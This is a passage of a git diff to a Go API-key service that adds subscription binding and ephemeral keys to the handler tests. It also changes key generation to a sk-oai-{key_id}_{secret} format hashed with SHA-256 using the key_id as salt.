keyID := fmt.Sprintf("%s-active-%d", username, i) keyHash := fmt.Sprintf("%s-hash-active-%d", username, i) name := fmt.Sprintf("%s Active Key %d", username, i) - err := store.AddKey(ctx, username, keyID, keyHash, name, "", []string{"system:authenticated"}, 
nil) + err := store.AddKey(ctx, username, keyID, keyHash, name, "", []string{"system:authenticated"}, testSubscriptionName, nil, false) require.NoError(t, err) } // Create 1 revoked key keyID := fmt.Sprintf("%s-revoked", username) keyHash := fmt.Sprintf("%s-hash-revoked", username) name := fmt.Sprintf("%s Revoked Key", username) - err := store.AddKey(ctx, username, keyID, keyHash, name, "", []string{"system:authenticated"}, nil) + err := store.AddKey(ctx, username, keyID, keyHash, name, "", []string{"system:authenticated"}, testSubscriptionName, nil, false) require.NoError(t, err) err = store.Revoke(ctx, keyID) require.NoError(t, err) @@ -697,7 +739,7 @@ func TestBulkRevokeAPIKeys(t *testing.T) { gin.SetMode(gin.TestMode) store := NewMockStore() cfg := &config.Config{} - service := NewServiceWithLogger(store, cfg, logger.Development()) + service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development()) handler := NewHandler(logger.Development(), service, newMockAdminChecker()) ctx := context.Background() @@ -707,7 +749,7 @@ func TestBulkRevokeAPIKeys(t *testing.T) { keyID := fmt.Sprintf("alice-key-%d", i) keyHash := fmt.Sprintf("alice-hash-%d", i) name := fmt.Sprintf("Alice Key %d", i) - err := store.AddKey(ctx, "alice", keyID, keyHash, name, "", []string{"system:authenticated"}, nil) + err := store.AddKey(ctx, "alice", keyID, keyHash, name, "", []string{"system:authenticated"}, testSubscriptionName, nil, false) require.NoError(t, err) } @@ -715,7 +757,7 @@ func TestBulkRevokeAPIKeys(t *testing.T) { keyID := fmt.Sprintf("bob-key-%d", i) keyHash := fmt.Sprintf("bob-hash-%d", i) name := fmt.Sprintf("Bob Key %d", i) - err := store.AddKey(ctx, "bob", keyID, keyHash, name, "", []string{"system:authenticated"}, nil) + err := store.AddKey(ctx, "bob", keyID, keyHash, name, "", []string{"system:authenticated"}, testSubscriptionName, nil, false) require.NoError(t, err) } @@ -770,7 +812,7 @@ func TestBulkRevokeAPIKeys(t *testing.T) { keyID := 
fmt.Sprintf("alice-key-%d", i) keyHash := fmt.Sprintf("alice-hash-%d", i) name := fmt.Sprintf("Alice Key %d", i) - err := store.AddKey(ctx, "alice", keyID, keyHash, name, "", []string{"system:authenticated"}, nil) + err := store.AddKey(ctx, "alice", keyID, keyHash, name, "", []string{"system:authenticated"}, testSubscriptionName, nil, false) require.NoError(t, err) } @@ -851,7 +893,7 @@ func TestUserCanCreateOwnKey(t *testing.T) { gin.SetMode(gin.TestMode) store := NewMockStore() cfg := &config.Config{} - service := NewServiceWithLogger(store, cfg, logger.Development()) + service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development()) handler := NewHandler(logger.Development(), service, newMockAdminChecker()) regularUser := &token.UserContext{ @@ -875,11 +917,104 @@ func TestUserCanCreateOwnKey(t *testing.T) { err := json.Unmarshal(w.Body.Bytes(), &response) require.NoError(t, err) + assert.Equal(t, testSubscriptionName, response.Subscription) + // Verify key is owned by alice with her actual groups meta, err := store.Get(context.Background(), response.ID) require.NoError(t, err) assert.Equal(t, "alice", meta.Username) assert.Equal(t, []string{"tier-free", "system:authenticated"}, meta.Groups) + assert.Equal(t, testSubscriptionName, meta.Subscription) +} + +func TestCreateAPIKey_WithExplicitSubscription(t *testing.T) { + gin.SetMode(gin.TestMode) + store := NewMockStore() + cfg := &config.Config{} + service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development()) + handler := NewHandler(logger.Development(), service, newMockAdminChecker()) + + user := &token.UserContext{Username: "alice", Groups: []string{"system:authenticated"}} + body := `{"name": "k1", "subscription": "custom-sub"}` + + w := httptest.NewRecorder() + c, _ := gin.CreateTestContext(w) + c.Request = httptest.NewRequest(http.MethodPost, "/v1/api-keys", nil) + c.Request.Header.Set("Content-Type", "application/json") + c.Request.Body = 
io.NopCloser(strings.NewReader(body)) + c.Set("user", user) + + handler.CreateAPIKey(c) + require.Equal(t, http.StatusCreated, w.Code) + + var response CreateAPIKeyResponse + require.NoError(t, json.Unmarshal(w.Body.Bytes(), &response)) + assert.Equal(t, "custom-sub", response.Subscription) + + meta, err := store.Get(context.Background(), response.ID) + require.NoError(t, err) + assert.Equal(t, "custom-sub", meta.Subscription) +} + +func TestCreateAPIKey_SubscriptionSelectErrors(t *testing.T) { + gin.SetMode(gin.TestMode) + user := &token.UserContext{Username: "alice", Groups: []string{"system:authenticated"}} + + tests := []struct { + name string + sel errSubSelector + body string + }{ + { + name: "explicit subscription not found", + sel: errSubSelector{ + selectErr: &subscription.SubscriptionNotFoundError{Subscription: "missing-sub"}, + }, + body: `{"name": "k1", "subscription": "missing-sub"}`, + }, + { + name: "explicit subscription access denied", + sel: errSubSelector{ + selectErr: &subscription.AccessDeniedError{Subscription: "other-sub"}, + }, + body: `{"name": "k1", "subscription": "other-sub"}`, + }, + { + name: "no accessible subscription when omitting field", + sel: errSubSelector{ + highestPriorityErr: &subscription.NoSubscriptionError{}, + }, + body: `{"name": "k1"}`, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + store := NewMockStore() + cfg := &config.Config{} + service := NewServiceWithLogger(store, cfg, tt.sel, logger.Development()) + h := NewHandler(logger.Development(), service, newMockAdminChecker()) + + w := httptest.NewRecorder() + c, _ := gin.CreateTestContext(w) + c.Request = httptest.NewRequest(http.MethodPost, "/v1/api-keys", nil) + c.Request.Header.Set("Content-Type", "application/json") + c.Request.Body = io.NopCloser(strings.NewReader(tt.body)) + c.Set("user", user) + + h.CreateAPIKey(c) + + assert.Equal(t, http.StatusBadRequest, w.Code) + var resp map[string]string + require.NoError(t, 
json.Unmarshal(w.Body.Bytes(), &resp)) + assert.Equal(t, apiKeySubscriptionResolutionErrCode, resp["code"]) + assert.Equal(t, apiKeySubscriptionResolutionErrMsg, resp["error"]) + + res, err := store.Search(context.Background(), user.Username, &SearchFilters{}, &SortParams{By: DefaultSortBy, Order: DefaultSortOrder}, &PaginationParams{Limit: 10, Offset: 0}) + require.NoError(t, err) + assert.Empty(t, res.Keys, "no key should be persisted on subscription resolution failure") + }) + } } // ============================================================ @@ -890,7 +1025,7 @@ func TestGetAPIKeyHandler(t *testing.T) { gin.SetMode(gin.TestMode) store := NewMockStore() cfg := &config.Config{} - service := NewServiceWithLogger(store, cfg, logger.Development()) + service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development()) handler := NewHandler(logger.Development(), service, newMockAdminChecker()) // Create test keys for alice and bob @@ -912,22 +1047,19 @@ func TestGetAPIKeyHandler(t *testing.T) { } // Add keys to store - err := store.AddKey(context.Background(), aliceKey.Username, aliceKey.ID, "hash1", aliceKey.Name, "", aliceKey.Groups, nil) + err := store.AddKey(context.Background(), aliceKey.Username, aliceKey.ID, "hash1", aliceKey.Name, "", aliceKey.Groups, testSubscriptionName, nil, false) require.NoError(t, err) - err = store.AddKey(context.Background(), bobKey.Username, bobKey.ID, "hash2", bobKey.Name, "", bobKey.Groups, nil) + err = store.AddKey(context.Background(), bobKey.Username, bobKey.ID, "hash2", bobKey.Name, "", bobKey.Groups, testSubscriptionName, nil, false) require.NoError(t, err) - t.Run("OwnerCanGetOwnKey", func(t *testing.T) { - aliceUser := &token.UserContext{ - Username: "alice", - Groups: []string{"tier-free"}, - } - + // Helper function to test successful key retrieval + testSuccessfulGetKey := func(t *testing.T, user *token.UserContext, keyID string) { + t.Helper() w := httptest.NewRecorder() c, _ := gin.CreateTestContext(w) 
- c.Request = httptest.NewRequest(http.MethodGet, "/v1/api-keys/alice-key-1", nil) - c.Set("user", aliceUser) - c.Params = gin.Params{{Key: "id", Value: "alice-key-1"}} + c.Request = httptest.NewRequest(http.MethodGet, "/v1/api-keys/"+keyID, nil) + c.Set("user", user) + c.Params = gin.Params{{Key: "id", Value: keyID}} handler.GetAPIKey(c) @@ -935,8 +1067,17 @@ func TestGetAPIKeyHandler(t *testing.T) { var response ApiKey err := json.Unmarshal(w.Body.Bytes(), &response) require.NoError(t, err) - assert.Equal(t, "alice-key-1", response.ID) + assert.Equal(t, keyID, response.ID) assert.Equal(t, "alice", response.Username) + assert.Equal(t, testSubscriptionName, response.Subscription) + } + + t.Run("OwnerCanGetOwnKey", func(t *testing.T) { + aliceUser := &token.UserContext{ + Username: "alice", + Groups: []string{"tier-free"}, + } + testSuccessfulGetKey(t, aliceUser, "alice-key-1") }) t.Run("RegularUserCannotGetOthersKey_IDOR_Protection", func(t *testing.T) { @@ -967,21 +1108,7 @@ func TestGetAPIKeyHandler(t *testing.T) { Username: "admin", Groups: []string{"admin-users"}, } - - w := httptest.NewRecorder() - c, _ := gin.CreateTestContext(w) - c.Request = httptest.NewRequest(http.MethodGet, "/v1/api-keys/alice-key-1", nil) - c.Set("user", adminUser) - c.Params = gin.Params{{Key: "id", Value: "alice-key-1"}} - - handler.GetAPIKey(c) - - assert.Equal(t, http.StatusOK, w.Code) - var response ApiKey - err := json.Unmarshal(w.Body.Bytes(), &response) - require.NoError(t, err) - assert.Equal(t, "alice-key-1", response.ID) - assert.Equal(t, "alice", response.Username) + testSuccessfulGetKey(t, adminUser, "alice-key-1") }) t.Run("NonExistentKeyReturns404", func(t *testing.T) { @@ -1011,11 +1138,11 @@ func testRevokeKeySuccess(t *testing.T, user *token.UserContext) { t.Helper() store := NewMockStore() cfg := &config.Config{} - service := NewServiceWithLogger(store, cfg, logger.Development()) + service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development()) 
handler := NewHandler(logger.Development(), service, newMockAdminChecker()) // Create alice's key - err := store.AddKey(context.Background(), "alice", "alice-key-1", "hash1", "Alice's Key", "", []string{"tier-free"}, nil) + err := store.AddKey(context.Background(), "alice", "alice-key-1", "hash1", "Alice's Key", "", []string{"tier-free"}, testSubscriptionName, nil, false) require.NoError(t, err) w := httptest.NewRecorder() @@ -1054,11 +1181,11 @@ func TestRevokeAPIKeyHandler(t *testing.T) { t.Run("RegularUserCannotRevokeOthersKey_IDOR_Protection", func(t *testing.T) { store := NewMockStore() cfg := &config.Config{} - service := NewServiceWithLogger(store, cfg, logger.Development()) + service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development()) handler := NewHandler(logger.Development(), service, newMockAdminChecker()) // Create alice's key - err := store.AddKey(context.Background(), "alice", "alice-key-1", "hash1", "Alice's Key", "", []string{"tier-free"}, nil) + err := store.AddKey(context.Background(), "alice", "alice-key-1", "hash1", "Alice's Key", "", []string{"tier-free"}, testSubscriptionName, nil, false) require.NoError(t, err) // Bob trying to revoke Alice's key @@ -1099,7 +1226,7 @@ func TestRevokeAPIKeyHandler(t *testing.T) { t.Run("NonExistentKeyReturns404", func(t *testing.T) { store := NewMockStore() cfg := &config.Config{} - service := NewServiceWithLogger(store, cfg, logger.Development()) + service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development()) handler := NewHandler(logger.Development(), service, newMockAdminChecker()) aliceUser := &token.UserContext{ @@ -1121,11 +1248,11 @@ func TestRevokeAPIKeyHandler(t *testing.T) { t.Run("CannotRevokeAlreadyRevokedKey", func(t *testing.T) { store := NewMockStore() cfg := &config.Config{} - service := NewServiceWithLogger(store, cfg, logger.Development()) + service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development()) handler := 
NewHandler(logger.Development(), service, newMockAdminChecker()) // Create and immediately revoke alice's key - err := store.AddKey(context.Background(), "alice", "alice-key-1", "hash1", "Alice's Key", "", []string{"tier-free"}, nil) + err := store.AddKey(context.Background(), "alice", "alice-key-1", "hash1", "Alice's Key", "", []string{"tier-free"}, testSubscriptionName, nil, false) require.NoError(t, err) err = store.Revoke(context.Background(), "alice-key-1") require.NoError(t, err) @@ -1147,3 +1274,188 @@ func TestRevokeAPIKeyHandler(t *testing.T) { assert.Equal(t, http.StatusNotFound, w.Code) }) } + +// ============================================================ +// EPHEMERAL API KEY TESTS +// ============================================================ + +func TestCreateEphemeralAPIKey(t *testing.T) { + gin.SetMode(gin.TestMode) + store := NewMockStore() + cfg := &config.Config{} + service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development()) + handler := NewHandler(logger.Development(), service, newMockAdminChecker()) + + testUser := &token.UserContext{ + Username: "playground-user", + Groups: []string{"system:authenticated"}, + } + + t.Run("EphemeralKeyBindsSubscriptionAtMint", func(t *testing.T) { + requestBody := `{"ephemeral": true}` + + w := httptest.NewRecorder() + c, _ := gin.CreateTestContext(w) + c.Request = httptest.NewRequest(http.MethodPost, "/v1/api-keys", nil) + c.Request.Header.Set("Content-Type", "application/json") + c.Request.Body = io.NopCloser(strings.NewReader(requestBody)) + c.Set("user", testUser) + + handler.CreateAPIKey(c) + + require.Equal(t, http.StatusCreated, w.Code) + var response CreateAPIKeyResponse + require.NoError(t, json.Unmarshal(w.Body.Bytes(), &response)) + + assert.Equal(t, testSubscriptionName, response.Subscription, + "ephemeral mint response should include bound subscription") + + meta, err := store.Get(context.Background(), response.ID) + require.NoError(t, err) + assert.Equal(t, 
testSubscriptionName, meta.Subscription, + "stored key metadata should include subscription") + + valResult, err := service.ValidateAPIKey(context.Background(), response.Key) + require.NoError(t, err) + require.True(t, valResult.Valid, "ephemeral key should validate") + assert.Equal(t, testSubscriptionName, valResult.Subscription, + "validation result should echo subscription for Authorino") + }) + + t.Run("EphemeralKeyWithoutName", func(t *testing.T) { + requestBody := `{"ephemeral": true}` + + w := httptest.NewRecorder() + c, _ := gin.CreateTestContext(w) + c.Request = httptest.NewRequest(http.MethodPost, "/v1/api-keys", nil) + c.Request.Header.Set("Content-Type", "application/json") + c.Request.Body = io.NopCloser(strings.NewReader(requestBody)) + c.Set("user", testUser) + + handler.CreateAPIKey(c) + + assert.Equal(t, http.StatusCreated, w.Code) + var response CreateAPIKeyResponse + err := json.Unmarshal(w.Body.Bytes(), &response) + require.NoError(t, err) + + // Name should be auto-generated + assert.Contains(t, response.Name, "ephemeral-") + // Expiration should be set (1hr default) + assert.NotNil(t, response.ExpiresAt) + // Ephemeral flag should be true in response + assert.True(t, response.Ephemeral, "ephemeral should be true in response") + }) + + t.Run("EphemeralKeyWithName", func(t *testing.T) { + requestBody := `{"ephemeral": true, "name": "my-playground-key"}` + + w := httptest.NewRecorder() + c, _ := gin.CreateTestContext(w) + c.Request = httptest.NewRequest(http.MethodPost, "/v1/api-keys", nil) + c.Request.Header.Set("Content-Type", "application/json") + c.Request.Body = io.NopCloser(strings.NewReader(requestBody)) + c.Set("user", testUser) + + handler.CreateAPIKey(c) + + assert.Equal(t, http.StatusCreated, w.Code) + var response CreateAPIKeyResponse + err := json.Unmarshal(w.Body.Bytes(), &response) + require.NoError(t, err) + + assert.Equal(t, "my-playground-key", response.Name) + // Ephemeral flag should be true in response + assert.True(t, 
response.Ephemeral, "ephemeral should be true in response") + }) + + t.Run("NonEphemeralRequiresName", func(t *testing.T) { + requestBody := `{}` + + w := httptest.NewRecorder() + c, _ := gin.CreateTestContext(w) + c.Request = httptest.NewRequest(http.MethodPost, "/v1/api-keys", nil) + c.Request.Header.Set("Content-Type", "application/json") + c.Request.Body = io.NopCloser(strings.NewReader(requestBody)) + c.Set("user", testUser) + + handler.CreateAPIKey(c) + + assert.Equal(t, http.StatusBadRequest, w.Code) + var response map[string]string + err := json.Unmarshal(w.Body.Bytes(), &response) + require.NoError(t, err) + assert.Contains(t, response["error"], "name is required") + }) + + t.Run("EphemeralKeyExceedsMaxExpiration", func(t *testing.T) { + // Try to create ephemeral key with 2hr expiration (exceeds 1hr max) + requestBody := `{"ephemeral": true, "expiresIn": "2h"}` + + w := httptest.NewRecorder() + c, _ := gin.CreateTestContext(w) + c.Request = httptest.NewRequest(http.MethodPost, "/v1/api-keys", nil) + c.Request.Header.Set("Content-Type", "application/json") + c.Request.Body = io.NopCloser(strings.NewReader(requestBody)) + c.Set("user", testUser) + + handler.CreateAPIKey(c) + + assert.Equal(t, http.StatusBadRequest, w.Code) + var response map[string]string + err := json.Unmarshal(w.Body.Bytes(), &response) + require.NoError(t, err) + assert.Contains(t, response["error"], "cannot exceed 1 hour") + }) +} + +func TestSearchExcludesEphemeralByDefault(t *testing.T) { + gin.SetMode(gin.TestMode) + store := NewMockStore() + cfg := &config.Config{} + service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development()) + handler := NewHandler(logger.Development(), service, newMockAdminChecker()) + + ctx := context.Background() + testUser := &token.UserContext{ + Username: "test-user", + Groups: []string{"system:authenticated"}, + } + + // Create regular keys + err := store.AddKey(ctx, testUser.Username, "regular-key-1", "hash-1", "Regular Key 1", "", 
[]string{"system:authenticated"}, testSubscriptionName, nil, false) + require.NoError(t, err) + err = store.AddKey(ctx, testUser.Username, "regular-key-2", "hash-2", "Regular Key 2", "", []string{"system:authenticated"}, testSubscriptionName, nil, false) + require.NoError(t, err) + + // Create ephemeral keys + err = store.AddKey(ctx, testUser.Username, "ephemeral-key-1", "hash-3", "Ephemeral Key 1", "", []string{"system:authenticated"}, testSubscriptionName, nil, true) + require.NoError(t, err) + err = store.AddKey(ctx, testUser.Username, "ephemeral-key-2", "hash-4", "Ephemeral Key 2", "", []string{"system:authenticated"}, testSubscriptionName, nil, true) + require.NoError(t, err) + + t.Run("DefaultSearchExcludesEphemeral", func(t *testing.T) { + requestBody := `{}` + response := executeSearchRequest(t, handler, requestBody, testUser) + + assert.Len(t, response.Data, 2, "should only return regular keys") + for _, key := range response.Data { + assert.False(t, key.Ephemeral, "should not include ephemeral keys") + } + }) + + t.Run("IncludeEphemeralFilter", func(t *testing.T) { + requestBody := `{"filters": {"includeEphemeral": true}}` + response := executeSearchRequest(t, handler, requestBody, testUser) + + assert.Len(t, response.Data, 4, "should return all keys including ephemeral") + + ephemeralCount := 0 + for _, key := range response.Data { + if key.Ephemeral { + ephemeralCount++ + } + } + assert.Equal(t, 2, ephemeralCount, "should have 2 ephemeral keys") + }) +} diff --git a/maas-api/internal/api_keys/keygen.go b/maas-api/internal/api_keys/keygen.go index bc8b73d63..442b2fd23 100644 --- a/maas-api/internal/api_keys/keygen.go +++ b/maas-api/internal/api_keys/keygen.go @@ -3,86 +3,173 @@ package api_keys import ( "crypto/rand" "crypto/sha256" + "crypto/subtle" "encoding/hex" + "errors" "fmt" "math/big" "strings" ) const ( - // KeyPrefix is the prefix for all OpenShift AI API keys + // KeyPrefix is the prefix for all OpenShift AI API keys. 
// Per Feature Refinement: "Simple Opaque Key Format" - keys must be short, opaque strings // with a recognizable prefix matching industry standards (OpenAI, Stripe, GitHub). KeyPrefix = "sk-oai-" - // entropyBytes is the number of random bytes to generate (256 bits). + // KeyIDSeparator separates the key_id from the secret in the API key. + KeyIDSeparator = "_" + + // keyIDBytes is the number of random bytes for key_id (96 bits → ~16 base62 chars). + keyIDBytes = 12 + + // entropyBytes is the number of random bytes for the secret (256 bits). entropyBytes = 32 - // displayPrefixLength is the number of chars to show in the display prefix (after sk-oai-). + // displayPrefixLength is the number of chars to show in the display prefix. displayPrefixLength = 12 ) -// GenerateAPIKey creates a new API key with format: sk-oai-{base62_encoded_256bit_random} +// GenerateAPIKey creates a new API key with format: sk-oai-{key_id}_{secret} // Returns: (plaintext_key, sha256_hash, display_prefix, error) // // Security properties (per Feature Refinement "Key Format & Security"): -// - 256 bits of cryptographic entropy +// - key_id: 96-bit random identifier (~16 base62 chars, guaranteed >= 12), used as unique salt +// - secret: 256 bits of cryptographic entropy (~43 base62 chars) +// - Hash: SHA-256(key_id + "\x00" + secret) - null delimiter prevents length-ambiguity attacks // - Base62 encoding (alphanumeric only, URL-safe) -// - SHA-256 hash for storage (plaintext never stored) -// - Display prefix for UI identification. +// - Display prefix shows first 12 chars of key_id for UI identification. +// - Use ParseAPIKey() to extract key_id and secret if needed. // //nolint:nonamedreturns // Named returns improve readability for multiple return values. func GenerateAPIKey() (plaintext, hash, prefix string, err error) { - // 1. 
Generate 32 bytes (256 bits) of cryptographic entropy - entropy := make([]byte, entropyBytes) - if _, err := rand.Read(entropy); err != nil { - return "", "", "", fmt.Errorf("failed to generate entropy: %w", err) + // 1. Generate key_id (96 bits → ~16 base62 chars) + keyIDEntropy := make([]byte, keyIDBytes) + if _, err := rand.Read(keyIDEntropy); err != nil { + return "", "", "", fmt.Errorf("failed to generate key_id entropy: %w", err) } + keyID := encodeBase62(keyIDEntropy) - // 2. Encode to base62 (alphanumeric only, no special characters) - encoded := encodeBase62(entropy) + // 2. Generate secret (256 bits → ~43 base62 chars) + secretEntropy := make([]byte, entropyBytes) + if _, err := rand.Read(secretEntropy); err != nil { + return "", "", "", fmt.Errorf("failed to generate secret entropy: %w", err) + } + secret := encodeBase62(secretEntropy) - // 3. Construct key with OpenShift AI prefix - plaintext = KeyPrefix + encoded + // 3. Construct key: sk-oai-{key_id}_{secret} + plaintext = KeyPrefix + keyID + KeyIDSeparator + secret - // 4. Compute SHA-256 hash for storage - hash = HashAPIKey(plaintext) + // 4. Compute salted hash: SHA-256(key_id + "\x00" + secret) + // key_id serves as a unique per-key salt (FIPS 180-4 compliant) + hash = hashWithSalt(keyID, secret) - // 5. Create display prefix (first 12 chars + ellipsis) - if len(encoded) >= displayPrefixLength { - prefix = KeyPrefix + encoded[:displayPrefixLength] + "..." + // 5. Create display prefix (first 12 chars of key_id + ellipsis) + if len(keyID) >= displayPrefixLength { + prefix = KeyPrefix + keyID[:displayPrefixLength] + "..." } else { - prefix = KeyPrefix + encoded + "..." + prefix = KeyPrefix + keyID + "..." } return plaintext, hash, prefix, nil } -// HashAPIKey computes SHA-256 hash of an API key (for validation and storage) -// This is the canonical hashing function - used by both key creation and validation. 
-func HashAPIKey(key string) string { - h := sha256.Sum256([]byte(key)) +// hashWithSalt computes SHA-256(keyID + "\x00" + secret) for storage. +// The keyID serves as a unique per-key salt, providing FIPS 180-4 compliant hashing. +// The null byte delimiter prevents length-ambiguity attacks where different keyID/secret +// splits could produce the same hash (e.g., "ab"+"c" vs "a"+"bc"). +func hashWithSalt(keyID, secret string) string { + h := sha256.Sum256([]byte(keyID + "\x00" + secret)) return hex.EncodeToString(h[:]) } -// IsValidKeyFormat checks if a key has the correct sk-oai-* prefix and valid base62 body. +// ParseAPIKey extracts the key_id and secret from an API key. +// Returns: (key_id, secret, error). +// Key format: sk-oai-{key_id}_{secret}. +func ParseAPIKey(key string) (string, string, error) { + if !strings.HasPrefix(key, KeyPrefix) { + return "", "", errors.New("invalid key prefix") + } + + body := key[len(KeyPrefix):] + parts := strings.SplitN(body, KeyIDSeparator, 2) + if len(parts) != 2 { + return "", "", errors.New("invalid key format: missing separator") + } + + keyID := parts[0] + secret := parts[1] + + if keyID == "" || secret == "" { + return "", "", errors.New("invalid key format: empty key_id or secret") + } + + return keyID, secret, nil +} + +// ValidateAPIKeyHash validates an API key against a stored hash. +// Computes SHA-256(key_id + "\x00" + secret) and compares with stored hash using constant-time comparison. +func ValidateAPIKeyHash(key, storedHash string) bool { + keyID, secret, err := ParseAPIKey(key) + if err != nil { + return false + } + + computedHash := hashWithSalt(keyID, secret) + return subtle.ConstantTimeCompare([]byte(computedHash), []byte(storedHash)) == 1 +} + +// HashAPIKey computes SHA-256 hash of an API key for validation. +// Parses the key to extract key_id and secret, then computes SHA-256(key_id + "\x00" + secret). +// Returns empty string if key format is invalid. 
+func HashAPIKey(key string) string { + keyID, secret, err := ParseAPIKey(key) + if err != nil { + return "" + } + return hashWithSalt(keyID, secret) +} + +// IsValidKeyFormat checks if a key has the correct format: sk-oai-{key_id}_{secret} +// Both key_id and secret must be non-empty base62 strings. func IsValidKeyFormat(key string) bool { if !strings.HasPrefix(key, KeyPrefix) { return false } body := key[len(KeyPrefix):] - if len(body) == 0 { - return false // Reject empty body + parts := strings.SplitN(body, KeyIDSeparator, 2) + if len(parts) != 2 { + return false // Must have exactly one separator + } + + keyID := parts[0] + secret := parts[1] + + if keyID == "" || secret == "" { + return false // Both parts must be non-empty + } + + // Validate key_id is base62 + if !isBase62(keyID) { + return false + } + + // Validate secret is base62 + if !isBase62(secret) { + return false } - // Validate base62 charset (0-9, A-Z, a-z) - for _, c := range body { + return true +} + +// isBase62 checks if a string contains only base62 characters (0-9, A-Z, a-z). 
+func isBase62(s string) bool { + for _, c := range s { if (c < '0' || c > '9') && (c < 'A' || c > 'Z') && (c < 'a' || c > 'z') { return false } } - return true } diff --git a/maas-api/internal/api_keys/keygen_test.go b/maas-api/internal/api_keys/keygen_test.go index bc653a6de..b60d6fd5e 100644 --- a/maas-api/internal/api_keys/keygen_test.go +++ b/maas-api/internal/api_keys/keygen_test.go @@ -2,6 +2,7 @@ package api_keys_test import ( "regexp" + "strings" "testing" "github.com/opendatahub-io/models-as-a-service/maas-api/internal/api_keys" @@ -14,44 +15,61 @@ func TestGenerateAPIKey(t *testing.T) { t.Fatalf("GenerateAPIKey() returned error: %v", err) } - // Test 1: Key has correct prefix + // Test 1: Key has correct format (sk-oai-{key_id}_{secret}) if !api_keys.IsValidKeyFormat(plaintext) { - t.Errorf("GenerateAPIKey() key missing prefix 'sk-oai-': got %q", plaintext) + t.Errorf("GenerateAPIKey() key has invalid format: got %q", plaintext) } - // Test 2: Hash is 64 hex characters (SHA-256) + // Extract key_id using ParseAPIKey for further tests + keyID, _, parseErr := api_keys.ParseAPIKey(plaintext) + if parseErr != nil { + t.Fatalf("ParseAPIKey() failed on generated key: %v", parseErr) + } + + // Test 2: Key contains the key_id + if !strings.Contains(plaintext, keyID) { + t.Errorf("GenerateAPIKey() key should contain key_id %q: got %q", keyID, plaintext) + } + + // Test 3: Key has correct structure (prefix + key_id + separator + secret) + if !strings.HasPrefix(plaintext, api_keys.KeyPrefix+keyID+api_keys.KeyIDSeparator) { + t.Errorf("GenerateAPIKey() key should have format sk-oai-{key_id}_{secret}: got %q", plaintext) + } + + // Test 4: Hash is 64 hex characters (SHA-256) if len(hash) != 64 { t.Errorf("GenerateAPIKey() hash length = %d, want 64", len(hash)) } - // Test 3: Hash is valid hex + // Test 5: Hash is valid hex hexRegex := regexp.MustCompile("^[0-9a-f]{64}$") if !hexRegex.MatchString(hash) { t.Errorf("GenerateAPIKey() hash is not valid hex: %q", hash) } - 
// Test 4: Prefix has correct format + // Test 6: Prefix has correct format (shows first 12 chars of key_id) + // Note: 96-bit key_id encodes to ~16 base62 chars (log62(2^96) ≈ 16.1), so key_id + // is always >= 12 chars, making the displayPrefixLength truncation always apply. prefixRegex := regexp.MustCompile(`^sk-oai-[A-Za-z0-9]{12}\.\.\.$`) if !prefixRegex.MatchString(prefix) { t.Errorf("GenerateAPIKey() prefix format incorrect: got %q", prefix) } - // Test 5: Key is alphanumeric after prefix (base62) - keyBody := plaintext[len(api_keys.KeyPrefix):] + // Test 7: key_id is base62 and expected length (~16 chars from 96 bits) alphanumRegex := regexp.MustCompile("^[A-Za-z0-9]+$") - if !alphanumRegex.MatchString(keyBody) { - t.Errorf("GenerateAPIKey() key body not alphanumeric: got %q", keyBody) + if !alphanumRegex.MatchString(keyID) { + t.Errorf("GenerateAPIKey() key_id not alphanumeric: got %q", keyID) } - - // Test 6: Key body is sufficiently long (256 bits → ~43 base62 chars) - if len(keyBody) < 40 { - t.Errorf("GenerateAPIKey() key body too short: got %d chars, want >= 40", len(keyBody)) + // 96 bits of entropy → log62(2^96) ≈ 16.1 chars, so key_id should be 15-17 chars + if len(keyID) < 12 { + t.Errorf("GenerateAPIKey() key_id too short: got %d chars, want >= 12", len(keyID)) } } func TestGenerateAPIKey_Uniqueness(t *testing.T) { // Generate multiple keys and ensure they're unique keys := make(map[string]bool) + keyIDs := make(map[string]bool) hashes := make(map[string]bool) for i := range 100 { @@ -60,11 +78,21 @@ func TestGenerateAPIKey_Uniqueness(t *testing.T) { t.Fatalf("GenerateAPIKey() iteration %d returned error: %v", i, err) } + keyID, _, parseErr := api_keys.ParseAPIKey(plaintext) + if parseErr != nil { + t.Fatalf("ParseAPIKey() iteration %d returned error: %v", i, parseErr) + } + if keys[plaintext] { t.Errorf("GenerateAPIKey() generated duplicate key on iteration %d", i) } keys[plaintext] = true + if keyIDs[keyID] { + t.Errorf("GenerateAPIKey() 
generated duplicate key_id on iteration %d", i) + } + keyIDs[keyID] = true + if hashes[hash] { t.Errorf("GenerateAPIKey() generated duplicate hash on iteration %d", i) } @@ -73,8 +101,8 @@ func TestGenerateAPIKey_Uniqueness(t *testing.T) { } func TestHashAPIKey(t *testing.T) { - // Compute the hash for the test key - testKey := "sk-oai-test123" + // Use the new key format: sk-oai-{key_id}_{secret} + testKey := "sk-oai-testKeyID123_testSecretValue456" hash := api_keys.HashAPIKey(testKey) // Verify consistent hashing @@ -89,24 +117,130 @@ func TestHashAPIKey(t *testing.T) { } // Verify different keys produce different hashes - differentHash := api_keys.HashAPIKey("sk-oai-different") + differentHash := api_keys.HashAPIKey("sk-oai-differentID_differentSecret") if hash == differentHash { t.Error("HashAPIKey() produced same hash for different keys") } + + // Verify invalid key format returns empty hash + invalidHash := api_keys.HashAPIKey("invalid-key-no-separator") + if invalidHash != "" { + t.Errorf("HashAPIKey() should return empty string for invalid format, got %q", invalidHash) + } +} + +func TestParseAPIKey(t *testing.T) { + tests := []struct { + name string + key string + wantKeyID string + wantSecret string + wantErr bool + }{ + { + name: "valid key", + key: "sk-oai-myKeyID123_mySecretValue456", + wantKeyID: "myKeyID123", + wantSecret: "mySecretValue456", + wantErr: false, + }, + { + name: "missing prefix", + key: "myKeyID123_mySecretValue456", + wantErr: true, + }, + { + name: "missing separator", + key: "sk-oai-noSeparatorHere", + wantErr: true, + }, + { + name: "empty key_id", + key: "sk-oai-_onlySecret", + wantErr: true, + }, + { + name: "empty secret", + key: 